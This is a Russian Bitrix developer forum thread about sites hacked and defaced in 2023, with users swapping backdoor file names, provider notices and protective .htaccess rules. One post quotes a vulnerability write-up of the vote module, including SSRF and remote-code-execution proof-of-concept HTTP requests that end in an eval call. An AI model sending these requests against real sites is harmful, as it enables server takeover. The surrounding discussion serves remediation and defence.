Разработчикам

Взломаны сайты в честь дня конституции украины

RSS

Пользователь 6403492

Заглянувший

Сообщений: 16 Баллов: 1 Регистрация: 02.07.2022

#776

31.05.2023 14:58:43

Цитата
написал: Долго ругался с ТП, в итого они пришли к выводу что блокировка ТСПУ

И ругаться с ТП не стоит, они никогда не враги вам, сам в ТП

Пользователь 1596051

Заглянувший

Сообщений: 5 Регистрация: 05.12.2017

#777

31.05.2023 15:37:47

Цитата
написал: А 80 http не тронули потому что там всегда редирект на https

Хотябы редирект на страницу бы сделали, чтобы понимать что делать, а тут в тупую блок и все

Вот если бы сатайт и с моего IP не работал то все понятно бы было, а тут похоже у моего провадера нет такого оборудования и у меня все нормально работало. А у других не открывалось.

С ТП просто Смотрели сотрели, говорят нужно платная услуга для анализа, покупаю, анализируют и гооврят извените не можем помочь.

Сайт после письма разбанили и заработал по HTTPS

Пользователь 6403492

Заглянувший

Сообщений: 16 Баллов: 1 Регистрация: 02.07.2022

#778

31.05.2023 15:51:55

Цитата
написал: Сайт после письма разбанили и заработал по HTTPS

А куда отправляли письмо если не секрет ?

Цитата
написал: Вот если бы сатайт и с моего IP не работал то все понятно бы было, а тут похоже у моего провадера нет такого оборудования и у меня все нормально работало. А у других не открывалось.

Это не РКН работало, а ТСПУ ЦМУ ССОП вроде как

Пользователь 1596051 Заглянувший Сообщений: 5 Регистрация: 05.12.2017	#779 31.05.2023 16:14:35 С уважением, Команда Национального координационного центра по компьютерным инцидентам 107031, г. Москва, ул. Большая Лубянка, д. 1/3 Email: incident@cert.gov.ru Сайт: http://cert.gov.ru/ Тел.: +7 (916) 901-07-42 Им даже можно позвонить

Пользователь 223987

Посетитель

Сообщений: 34 Баллов: 6 Регистрация: 27.12.2013

#780

31.05.2023 17:11:58

За последние 2 дня несколько клиентов прислали рекомендации по закрытию новой уязвимости в 1С-Битрикс. Скидываю ссылки на pdf-файлы:
https://yadi.sk/i/IkLSgFUyXG18IQ раз
https://yadi.sk/d/jMqouVLZpHfu7Q два

Пишут что уязвимость в файле /bitrix/tools/spread.php, но ни на одном сайте не вижу этот файл по указанному пути!
Файл который я нашел по пути /bitrix/modules/main/spread.php имеет совсем другое содержимое, чем на скриншоте в первом документе.

У кого-нибудь есть этот файл по указанному в рекомендациях пути? У кого какие мысли по этому файлу и по этим рекомендациям?

Пользователь 1329903

Эксперт

Сообщений: 299 Баллов: 45 Регистрация: 15.08.2017

#781

31.05.2023 17:17:29

Цитата
Илья Тамаров написал: bitrix/tools/spread.php,

Это вредоносный файл, который просто нужно удалить, а не модифицировать.
На сайте его быть не должно, если он есть, значит вас уже взломали.

Пользователь 13618

Эксперт

Сообщений: 1336 Баллов: 225 Регистрация: 05.04.2011

Сертифицированный партнер

#782

31.05.2023 17:45:10

Цитата
написал: У кого-нибудь есть этот файл по указанному в рекомендациях пути? У кого какие мысли по этому файлу и по этим рекомендациям?

фигня какая то - это не уязвимость движка, а уже использование залитого бэкдора
лучше бы написали как этот spread.php в /tools/ появляется - вот это наверное уже из уязвимостей Битры было бы

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 4831394

Заглянувший

Сообщений: 1 Регистрация: 01.12.2020

#783

01.06.2023 14:29:33

Надо уже наконец таки решить вопрос с Битриксом. Они совсем не занимаются проектом и его безопастностью. В связи с этим предлагаю собраться всем и написать в компетентные ограны заявление о том что компания продает продукт не подлежаший ни какой критике. Продавать уже бюлее 10 лет одно и то же без каких либо изменений в лучшую сторону.

Пользователь 89140 Заглянувший Сообщений: 17 Баллов: 2 Регистрация: 18.04.2011	#784 02.06.2023 12:13:45 Даже если ваше заявление воспримут всерьез - будет назначена экспертиза, а любой эксперт по Битриксу... внезапно, процитирует его же пресс-релизы.

Пользователь 2946275

Постоянный посетитель

Сообщений: 141 Баллов: 29 Регистрация: 21.02.2019

#785

02.06.2023 13:15:49

Цитата
написал: Даже если ваше заявление воспримут всерьез - будет назначена экспертиза, а любой эксперт по Битриксу... внезапно, процитирует его же пресс-релизы.

Думаю, если этим заниматься всерьез и без "поддавков", то могут назначить эксперта по информационной безопасности, который проведет различные pen-тесты.
И он точно скажет: "проблема неправильно настроенном окружении"(грубо говоря, у меня права 777 на все файлы и база с рутовым пользователем и паролем "qwerty". То есть, я косячник а не битрикс).

или

"ряд базовых модулей от битрикс имеет слабую защиту и выполняет любой код, который ему предлагают".

Пользователь 6403492

Заглянувший

Сообщений: 16 Баллов: 1 Регистрация: 02.07.2022

#786

03.06.2023 12:00:35

Так, товарищи которых взломали и задефесили, и они получили ТСПУ бан
Есть новая непроверенная инфа о том, что, тем кто не сделает исправления из методички, через 3 дня забанят домен в ТСПУ навсегда
Методичка:

https://mega.nz/file/M5MUQDxC#tlhEQvVm6ykLsfXd1CEkJXQ0gFYljK7z7XYB66rSpSA
https://fastupload.io/o1Irtc4hc36jjUg/file
https://uploadnow.io/f/tNMDTP0

Пользователь 1984577 Заглянувший Сообщений: 5 Регистрация: 19.05.2018	#787 11.06.2023 09:24:58 Здравствуйте! а как писать в поддержку с просроченной лицензией? они такой возможности не дают! Клиентоориентированность хайлевел. Даже при наличии такой уязвимости в их решении.

Пользователь 1984577

Заглянувший

Сообщений: 5 Регистрация: 19.05.2018

#788

11.06.2023 09:27:58

Мне прилетело ночью письмо от провайдера:

В настоящий момент к нам пришла жалоба на один из ваших сайтов .На сайте имеется уязвимость, которая позволяет злоумышленникам размещать на вашем сайте произвольную информацию.
Работа доменного имени в настоящий момент приостановлена. Для исправления ситуации, необходимо провести работы по обновлению ядра сайта, чтобы исправить имеющиеся уязвимости. Также стоит обратить внимания, что наша антивирусная система
не исправляет уязвимости и в некоторых случаях не может определить ее. Предоставляем вам список уязвимых модулей:
backdoor ru_bxroot
backdoor ru_maininput
backdoor ru_prologafter
backdoor ru_spread
vuln_htmleditor
vuln_vote

Рекомендуем проверить используются указанные модули на вашем сайте.

Также вам необходимо обратиться в компанию которая предоставляет услуги по аудиту безопасности. Подробности о сложившийся ситуации можно узнать по указанной ссылке https://www.cyberok.ru/docs/CyberOK-bitrix_web_1.pdf

Что делать, куда бежать - в Битрикс все закрыто, так как лицензии нет активной.

Сайт тупо заблокирован - стоит заглушка с возможными причинами: хостинг не оплачен, владелец решил закрыть сайт или нарушены правила хостинга. Я так понимаю, ни одна причина не подходит, а заглушка висит на всеобщее обозрение.

и вообще не факт что уязвимости есть..?
просто всех проверяют у кого Битрикс? Может такое быть?

Пользователь 1984577

Заглянувший

Сообщений: 5 Регистрация: 19.05.2018

#789

11.06.2023 09:34:08

Цитата

написал:

Цитата

написал:

Цитата

написал:

Цитата
написал: Тоже сегодня поймали на одном из сайтов "Мы IT Армия...

В поддержку писали?
Пишите, напишите сюда ответ.
Мне помогли, больше проблем нет.
Если все обновили, а проблема остается, значит остался скрипт. Уже в этой ветки писали, как решить проблему.

Ну на данный момент мы тоже вроде все решили, да. В поддержку не обращались. А что вам там ответили, какие инструкции/советы написали?

В поддержку надо было обратиться обязательно. У вас все обновлено, и вам в первую очередь туда - денег за это не берут.
У меня была история с сайтом с просроченной лицензией.
Поддержка попросила доступ, сами все почистили, указали, какие файл исправили, что удалили. Порекомендовали обновить сайт.
Какие файлы? Все тоже самое, что здесь и обсуждалось.

Здравствуйте!
помогите, пожалуйста.
Как писать в поддержку с просроченной лицензией?
они такой возможности не дают!

Клиентоориентированность хайлевел. Даже при наличии такой уязвимости в их решении.

Пользователь 108671

Постоянный посетитель

Сообщений: 139 Баллов: 23 Регистрация: 25.11.2011

#790

11.06.2023 11:16:13

Цитата
написал: Здравствуйте!помогите, пожалуйста.Как писать в поддержку с просроченной лицензией?они такой возможности не дают!Клиентоориентированность хайлевел. Даже при наличии такой уязвимости в их решении.

Если есть просроченная лицензия, то в поддержку может обратиться ваш партнер Битрикс, который вас сопровождает и имеет официальный статус.
Если такового нет, то обращайтесь к специалистам, которые занимались разработкой и сопровождением сайта, чтобы они восстановили работу сайта.
Если и таких нет, тогда надо таких найти. Специалистов по Битрикс, готовых решить вашу проблему достаточно.
Стоимость восстановления будет сопоставимой со стоимостью продления лицензии, а скорее всего и больше.

Пользователь 691725

Заглянувший

Сообщений: 2 Регистрация: 05.09.2016

#791

11.06.2023 17:53:31

Добрый день. Был взломан сайт. Откатили из резервной копии, обновили лицензию, проверили агенты и крон, подчистили файлы, прогнали через антивирус и поиск троянов. Есть сомнения по поводу пары файлов. Подскажите, пожалуйста, должны ли быть файлы seo_cache.php в /bitrix/tools/ и .sessions.php - корневой папке. Содержимое у этих файлов похоже. Этого файла .sessions.php вроде точно не должно быть , а вот насчет seo_cache.php не знаю. В папке /bitrix/tools/ так же наблюдаю файлы .sess,.session,.idSess. Проверила .session на содержимое, в нем странные массивы с паролями и логинами. Все файлы удалила, но остались сомнения. Хостинг beget. Данные файлы модуль по поиску троянов не обозначил как опасные.

Пользователь 1329903

Эксперт

Сообщений: 299 Баллов: 45 Регистрация: 15.08.2017

#792

11.06.2023 17:56:32

Цитата
Ирина Булатова написал: должны ли быть файлы seo_cache.php в /bitrix/tools/ и .sessions.php - корневой папке

Нет. Левые файлы.

Пользователь 691725

Заглянувший

Сообщений: 2 Регистрация: 05.09.2016

#793

11.06.2023 18:12:27

Цитата

написал:

Цитата
Ирина Булатова написал: должны ли быть файлы seo_cache.php в /bitrix/tools/ и .sessions.php - корневой папке

Нет. Левые файлы.

Спасибо за ответ.

Пользователь 63180

Эксперт

Сообщений: 620 Баллов: 110 Регистрация: 08.05.2010

#794

13.06.2023 14:26:49

нашел подробности

Скрытый текст

Код

vote это модуль, который идёт в поставке начиная с коробки Стандарт. Он каким-то
образом, добавляет функционал для голосования в системе и нам это абсолютно неважно. Важно то, что при анализе исходного кода в первую очередь ищется максимальное
количество конечных точек, где может быть осуществлено внедрение пользовательских
данных с последующей их обработкой. Которое позволит перехватить стандартную логику.
И один из сценариев структуры этого модуля стал такой точкой.

/bitrix/tools/vote/uf.php принимает на вход юзер-инпут и один из маршрутов этих
данных, путем различных манипуляций и проверок, доходит до уязвимого кода.

Предлагаю взглянуть на реверс стектрейс:
#7: require(string)
/var/www/html/bitrix/bitrix/tools/vote/uf.php:1
#6: Bitrix\Vote\Base\Controller->exec()
/var/www/html/bitrix/bitrix/modules/vote/tools/uf.php:22
#5: Bitrix\Vote\Base\Controller->runAction()
/var/www/html/bitrix/bitrix/modules/vote/lib/base/controller.php:104
#4: call_user_func(array)
/var/www/html/bitrix/bitrix/modules/vote/lib/base/controller.php:458
#3: Bitrix\Vote\Attachment\Controller->processActionVote()
#2: Bitrix\Vote\Attach->canRead(NULL)
/var/www/html/bitrix/bitrix/modules/vote/lib/attachment/controller.php:75
#1: Bitrix\Vote\Attach->getConnector()
/var/www/html/bitrix/bitrix/modules/vote/lib/attach.php:443
#0: Bitrix\Vote\Attachment\Connector::buildFromAttachedObject(object)
/var/www/html/bitrix/bitrix/modules/vote/lib/attach.php:491
/var/www/html/bitrix/bitrix/modules/vote/lib/attachment/connector.php:33

Размотать это впервые, вручную, было довольно весёлым (нет) занятием. И вряд ли
кому-то нужна целая простыня кода с пояснением здесь, ведь это не примитивный
пережиток прошлого подобно virtual_file_system.php, а вполне себе ООП. Поэтому
всех любознательных, прошу проследовать по приведённом дебагу и изучить подкапотку
самостоятельно.А мы точечно и планомерно возвращаемся к


/bitrix/modules/vote/lib/attachment/connector.php:33, смотрим что же там
такого:


final public static function buildFromAttachedObject(\Bitrix\Vote\Attach
$attachedObject)
{
if(!Loader::includeModule($attachedObject->getModuleId()))
{
throw new SystemException("Module
{$attachedObject->getModuleId()} is not included.");
}
$className = str_replace('\\\\', '\\',
$attachedObject->getEntityType());
/** @var \Bitrix\Vote\Attachment\Connector $connector */
$connector = new $className($attachedObject->getEntityId());
if(!$connector instanceof Connector)
{
throw new ObjectNotFoundException('Connector class should be
instance of Connector.');
}
if($connector instanceof Storable)
{
$connector->setStorage($attachedObject->getStorage());
}
return $connector;
}


/bitrix/modules/vote/lib/attachment/connector.php
$connector = new $className($attachedObject->getEntityId()); именно это
находится на 33 строке файла. Где мы контролируем имя класса и аргумент! Ну вот
именно так разработчик решил проверять принадлежность класса, создавая экземпляр,
он художник, он так видит. А нам это говорит о том, что можно вызвать конструктор
(__construct) любого подключенного в текущий момент класса, в том числе встроенных
в PHP.Пример SSRF используя built-in класс PDO:


POST
/bitrix/tools/vote/uf.php?attachId[ENTITY_TYPE]=PDO&attachId[ENTITY_ID]=uri
:http://some.internal.host/&attachId[MODULE_ID]=vote&action=vote HTTP/1.1
Host: bitrix
User-Agent: Mozilla/5.0
Cookie: PHPSESSID=mueruojo5ib155i8dhotfigv88;
Content-Type: application/x-www-form-urlencoded
sessid=6dbcf1c7e0f377899b688e033564fb07
В логах получим:
127.0.0.1 - - [01/May/2022:02:21:50 +0300] "GET / HTTP/1.0" 404 1216 "-" "-"

Достаточно весело, но не так как с RCE. Чтож, давайте продолжать.
Во время первичных раскопок, потыкав маленько что-то из личного запаса и убедившись,
что с наскоку ничего сделать не получится. Пришлось изучать все конструкторы битрикса,
коих в издании Стандарт насчиталось около 1200 штук. Поэтому какое-то время
пришлось наблюдать подобную монотонную рябь:
Но вас, благо, минует эта участь. Долго ли, коротко ли (не коротко), был найден очень
крутой класс CFileUploader. Помимо того, что он сам по себе позволяет через этот
Object Instantiation грузить произвольные файлы (фактически уже RCE).Так он ещё даёт нам возможность вызывать произвольные статические методы других
классов и этим грех не воспользоваться. Точнее вызывать дает не он, а
\Bitrix\Main\UI\Uploader\File\File, а если ещё точнее и не он тоже, но
инициатором всё же является CFileUploader. На этом и порешаем, а теперь PoC:

POST
/bitrix/tools/vote/uf.php?attachId[ENTITY_TYPE]=CFileUploader&attachId[ENTI
TY_ID][events][onFileIsStarted][]=CControllerClient&attachId[ENTITY_ID][eve
nts][onFileIsStarted][]=RunCommand&attachId[MODULE_ID]=vote&action=vote

Тот самый триггер вызова произвольных статических методов, о котором говорилось
ранее. Есть ExecuteModuleEventEx, который является частью событийного
функционала главного модуля (/bitrix/modules/main/classes/general/module.php). И в этом
кейсе, он усердно трудится в /bitrix/modules/main/lib/ui/uploader/file.php:
...
$eventName = "onFileIsStarted";
...
foreach(GetModuleEvents(Uploader::EVENT_NAME, $eventName, true) as
$event)
{
$error = "";
if (!ExecuteModuleEventEx($event, array($this->getHash(),
&$this->data, &$error)))
{
$this->addError(new Error($error, "BXU350.1"));
break;
}
}
/bitrix/modules/main/lib/ui/uploader/file.php
Где вызывает нам статический метод CControllerClient::RunCommand:
public static function RunCommand($command, $oRequest, $oResponse)
{
global $APPLICATION, $USER, $DB;
return eval($command);
}
/bitrix/modules/main/classes/general/controller_member.php
А помогает в пробросе аргументов CFileUploader, любезно протаскивая их через
параметр bxu_files. Как-то так. Там ещё не мало подкапотки, что осталась за кадром,
но саму суть цепочки, надеюсь объяснил.
В какой-то из следующих версий, в коде произошли изменения. Значение
$this->getHash() которое, в нашем случае, является ключом массива bxu_files
стали хешировать.

не верно проверялась принадлежность объекта классу (создавался экземпляр) вместо is_a(), а это имя класса можно было кидать через get параметр https://i.imgur.com/PDa6wUQ.png , дёргался конструктор, так ещё и входные данные можно было прокидывать)

видно что исходники поменялись в обновлениях..

обновляйтесь, или блокируйте вызов /bitrix/tools/vote/uf.php

Пользователь 547017

Заглянувший

Сообщений: 12 Баллов: 1 Регистрация: 04.04.2016

#795

13.06.2023 17:17:12

Цитата
обновляйтесь, или блокируйте вызов /bitrix/tools/vote/uf.php

Полностью поддерживаю!

Пользователь 7350284

Заглянувший

Сообщений: 1 Регистрация: 16.06.2023

#796

16.06.2023 09:47:32

Изначально мне помогала блокировка по IP адресу. Причем именно подсеть. Адреса конечные менялись.

Код

# Заблокировать доступ ряду IP-адресов
order allow,deny
deny from 31.184.236.*
deny from 51.222.*.*
deny from 66.249.64.*
deny from 79.137.202.*
deny from 79.137.206.*
deny from 91.193.43.*
deny from 94.228.169.*
deny from 162.253.68.*
deny from 173.208.253.*
deny from 212.113.119.*
deny from 216.244.66.*
deny from 94.180.142.*

allow from all

Пользователь 7377216

Заглянувший

Сообщений: 2 Баллов: 1 Регистрация: 28.06.2023

#797

28.06.2023 11:11:09

Здравствуйте!

В конце мая на нескольких сайтах в некоторых PHP-файлах появился код с большим количеством фрагментов типа "$GLOBALS['____" и функциями base64_decode(). Например, в файле "bitrix/modules/main/lib/UpdateSystem/ActivationSystem.php". Он теперь имеет полностью нечитаемый вид. То же самое в дистрибутиве, скачанном с сайта Bitrix (версия - Стандарт). Поясните, пожалуйста, ситуацию.

Пользователь 547017

Заглянувший

Сообщений: 12 Баллов: 1 Регистрация: 04.04.2016

#798

28.06.2023 12:15:14

Цитата
Андрей написал: Например, в файле "bitrix/modules/main/lib/UpdateSystem/ActivationSystem.php". Он теперь имеет полностью нечитаемый вид.

Эти файлы в папке UpdateSystem связанны с проверкой ключа и лицензии - их не нужно трогать.

Пользователь 108671

Постоянный посетитель

Сообщений: 139 Баллов: 23 Регистрация: 25.11.2011

#799

28.06.2023 12:16:02

Цитата

написал:
Здравствуйте!

В конце мая на нескольких сайтах в некоторых PHP-файлах появился код с большим количеством фрагментов типа "$GLOBALS['____" и функциями base64_decode(). Например, в файле "bitrix/modules/main/lib/UpdateSystem/ActivationSystem.php". Он теперь имеет полностью нечитаемый вид. То же самое в дистрибутиве, скачанном с сайта Bitrix (версия - Стандарт). Поясните, пожалуйста, ситуацию.

Все стандартно, проверяем на вирусы, пишем в ТП

Пользователь 61272

Посетитель

Сообщений: 35 Баллов: 5 Регистрация: 12.09.2011

#800

03.07.2023 12:51:57

24.06.2023 на одном из сайтов прилетело обновление в виде /bitrix/.htaccess такого содержания:

Код

# Start of Bitrix protection
# https://www.cyberok.ru/docs/CyberOK-bitrix_web_1.pdf

RewriteEngine On

RewriteRule ^tools/spread\.php$ - [F,NC,L]

RewriteCond %{REQUEST_METHOD} !GET

RewriteRule ^tools/upload\.php$ - [F,NC,L]
RewriteRule ^tools/mail_entry\.php$ - [F,NC,L]
RewriteRule ^modules/main/include/virtual_file_system\.php$ - [F,NC,L]
RewriteRule ^components/bitrix/sender.mail.editor/ajax\.php$ - [F,NC,L]
RewriteRule ^tools/vote/uf\.php$ - [F,NC,L]
RewriteRule ^tools/html_editor_action\.php$ - [F,NC,L]
RewriteRule ^admin/site_checker\.php$ - [F,NC,L]
# End of Bitrix protection

Что сломало загрузку файлов в инфоблоки.

Взломаны сайты в честь дня конституции украины

Продукты

Управление сайтом

Битрикс24

Интернет-магазин + CRM

Решения

Для интернет-магазинов

Каталог готовых решений

Внедрение

Выбрать партнера

Проверить партнера

Стать партнером